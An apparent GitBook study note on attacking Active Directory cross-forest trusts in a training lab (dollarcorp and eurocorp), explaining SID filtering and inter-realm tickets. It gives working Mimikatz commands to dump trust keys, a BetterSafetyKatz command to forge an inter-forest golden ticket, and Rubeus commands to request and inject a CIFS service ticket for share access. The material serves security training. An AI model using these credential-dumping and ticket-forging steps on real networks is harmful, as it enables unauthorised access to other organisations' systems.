# Cross Forest

If a user wants to access a service in eurocorp forest.

In step 4, we receive the inter-realm TGT which is encrypted using a Trust Key. Once the mcorp-dc decrypts the inter-realm TGT using the trust key, the user can request a TGS and then access the application server using the TGS. 

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FwYQhLX4P7a4R35xEvGCq%2Fimage.png?alt=media&#x26;token=f99630f8-0cf2-47be-a10e-b481e1c944ef" alt=""><figcaption><p>Trust Flow across Forest</p></figcaption></figure>

Genrally, it is not possible to escalate privileges across forests as the forest is a security boundary. It uses SID Filtering (500 > 1000). The TGT would be accepted but the SID would be filtered by the parent DC.

This means an Administrator of dcorp cannot access the DC of eurocorp and escalate to Enterprise Admin of eurocorp.

### Abusing Cross Forest Trusts

If there is a service on eurocorp that can be accessible by dcorp admins, we could use the trust key to access that resource.&#x20;

Once again, we require the trust key for the inter-forest trust. i.e, Trust between dcorp and eurocorp.

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
```

{% endcode %}

Or

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

{% endcode %}

An inter-forest TGT can be forged

{% code overflow="wrap" %}

```
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"
```

{% endcode %}

### Abuse with Rubeus

Using the same TGT which we forged earlier, we request a TGS for CIFS on ecorp:

{% code overflow="wrap" %}

```
Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
```

{% endcode %}

Now we can run commands on remote systems

{% code overflow="wrap" %}

```
ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
```

{% endcode %}

How to enumerate which file shares accessible to us?

{% code overflow="wrap" %}

```
net view \\eurocorp-dc.eurocorp.local
```

{% endcode %}

But enumerating this is not practical in real world because for 100 machines, we can't request 100 CIFS tickets and then run net view.